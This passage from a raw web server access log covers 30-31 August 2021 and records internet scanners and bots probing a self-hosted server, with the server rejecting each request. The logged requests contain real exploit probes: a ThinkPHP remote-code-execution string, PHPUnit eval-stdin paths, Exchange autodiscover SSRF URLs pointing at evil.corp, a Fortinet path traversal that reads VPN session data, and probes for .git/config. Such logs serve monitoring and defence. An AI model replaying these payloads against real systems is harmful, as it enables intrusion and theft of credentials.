AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [30/Aug/2021:05:49:13 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:05:49:15 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:05:49:16 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:05:49:17 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:05:49:19 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:05:49:21 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:05:49:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:06:15:49 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:06:21:59 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:06:43:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 68.183.129.127] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:06:43:13 +0000] 400 - - https localhost "-" [Client 68.183.129.127] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:06:43:14 +0000] 400 - - http localhost "-" [Client 68.183.129.127] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:06:43:24 +0000] 400 - - https localhost "-" [Client 68.183.129.127] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:06:43:25 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 68.183.129.127] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [30/Aug/2021:06:43:25 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 68.183.129.127] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [30/Aug/2021:06:43:25 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 68.183.129.127] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [30/Aug/2021:06:44:15 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Aug/2021:06:52:49 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:06:53:36 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:06:54:27 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [30/Aug/2021:06:56:10 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [30/Aug/2021:07:45:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.242.79.227] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3096.51 Safari/537.32" "-" [30/Aug/2021:07:45:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.242.79.227] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3096.51 Safari/537.32" "-" [30/Aug/2021:08:09:32 +0000] 400 - GET http localhost "/" [Client 138.197.161.102] [Length 252] [Gzip -] "-" "-" [30/Aug/2021:10:23:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.165.190.17] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [30/Aug/2021:10:23:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.165.190.17] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [30/Aug/2021:10:23:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.165.190.17] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [30/Aug/2021:10:23:51 +0000] 400 - - https localhost "-" [Client 185.165.190.17] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:10:23:52 +0000] 400 - - https localhost "-" [Client 185.165.190.17] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:10:23:52 +0000] 400 - - https localhost "-" [Client 185.165.190.17] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:10:23:55 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 185.165.190.17] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:10:23:56 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 185.165.190.17] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:10:23:56 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 185.165.190.17] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:10:24:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [30/Aug/2021:10:32:47 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.206.75] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:10:39:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.64] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:12:23:53 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@1337.com/owa/?&Email=autodiscover/autodiscover.json%3F@1337.com" [Client 45.227.255.235] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "-" [30/Aug/2021:12:23:54 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@1337.com/owa/?&Email=autodiscover/autodiscover.json%3F@1337.com" [Client 45.227.255.235] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "-" [30/Aug/2021:13:19:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [30/Aug/2021:13:24:22 +0000] 400 - - http localhost "-" [Client 194.61.24.78] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:15:07:21 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Aug/2021:15:51:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [30/Aug/2021:15:53:44 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:16:04:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [30/Aug/2021:16:10:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:16:18:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.168.141] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [30/Aug/2021:17:01:33 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Aug/2021:17:01:33 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Aug/2021:17:01:33 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Aug/2021:17:01:33 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Aug/2021:17:01:33 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Aug/2021:17:01:33 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Aug/2021:17:21:11 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.218.212] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:17:32:31 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.202.68] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:17:42:27 +0000] 444 - GET https mosquitto.moralanimal.net "/" [Client 218.17.86.55] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; HUAWEI P20 Build/816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4472.114 Mobile Safari/537.36" "-" [30/Aug/2021:18:24:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [30/Aug/2021:19:17:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Aug/2021:19:26:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Aug/2021:20:49:31 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:20:49:31 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:20:49:32 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:21:06:10 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.201.125] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:22:10:49 +0000] 400 - - https localhost "-" [Client 212.102.34.222] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:22:11:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [30/Aug/2021:22:34:52 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 144.86.173.147] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [30/Aug/2021:23:04:14 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 186.4.171.93] [Length 0] [Gzip -] "Python-urllib/3.9" "-" [30/Aug/2021:23:21:03 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.219.59] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:23:35:55 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:23:35:55 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:23:35:57 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:23:35:58 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:23:35:58 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:23:36:00 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:23:36:00 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:23:36:00 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:23:36:01 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:23:36:01 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [30/Aug/2021:23:36:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:00:11:09 +0000] 400 - - http localhost "-" [Client 185.156.72.30] [Length 154] [Gzip -] "-" "-" [31/Aug/2021:00:17:48 +0000] 400 - OPTIONS http 64.22.31.253 "/" [Client 212.102.35.132] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" "-" [31/Aug/2021:00:41:24 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [31/Aug/2021:00:41:24 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [31/Aug/2021:00:41:24 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [31/Aug/2021:01:15:11 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [31/Aug/2021:01:40:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.207.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Aug/2021:02:06:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.254] [Length 0] [Gzip -] "-" "-" [31/Aug/2021:02:57:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.15] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [31/Aug/2021:02:57:31 +0000] 400 - GET http 64.22.31.253 "/" [Client 185.180.143.15] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [31/Aug/2021:03:49:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Aug/2021:05:10:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.207.46] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Aug/2021:06:56:01 +0000] 400 - GET https localhost "/TfYI" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [31/Aug/2021:07:07:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Aug/2021:09:34:47 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [31/Aug/2021:10:34:19 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.207.191] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [31/Aug/2021:10:50:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Aug/2021:11:24:41 +0000] 400 - - http localhost "-" [Client 174.138.188.66] [Length 154] [Gzip -] "-" "-" [31/Aug/2021:12:05:24 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 144.86.173.77] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [31/Aug/2021:14:07:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.90] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [31/Aug/2021:16:02:23 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:16:02:23 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:16:02:27 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:16:02:27 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [31/Aug/2021:16:02:28 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:16:02:28 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:16:02:29 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:16:02:30 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:16:02:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:16:02:32 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:16:02:33 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [31/Aug/2021:17:01:37 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Aug/2021:17:01:37 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Aug/2021:17:01:37 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Aug/2021:17:01:37 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Aug/2021:17:01:37 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Aug/2021:17:01:37 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [31/Aug/2021:17:22:22 +0000] 444 - GET https jdownloader.moralanimal.net "/.git/config" [Client 51.210.80.127] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [31/Aug/2021:19:27:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [31/Aug/2021:19:48:42 +0000] 444 - GET https agent.moralanimal.net "/web/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [31/Aug/2021:20:04:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.206.128.78] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [31/Aug/2021:20:05:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 94.232.46.220] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [31/Aug/2021:20:15:20 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [31/Aug/2021:20:21:14 +0000] 444 - GET https agent.moralanimal.net "/news/wp-login.php" [Client 45.32.22.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [31/Aug/2021:21:05:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.114] [Length 0] [Gzip -] "-" "-" [31/Aug/2021:21:05:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "-" "-" [31/Aug/2021:21:05:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [31/Aug/2021:21:07:56 +0000] 444 - GET https 64.22.31.253 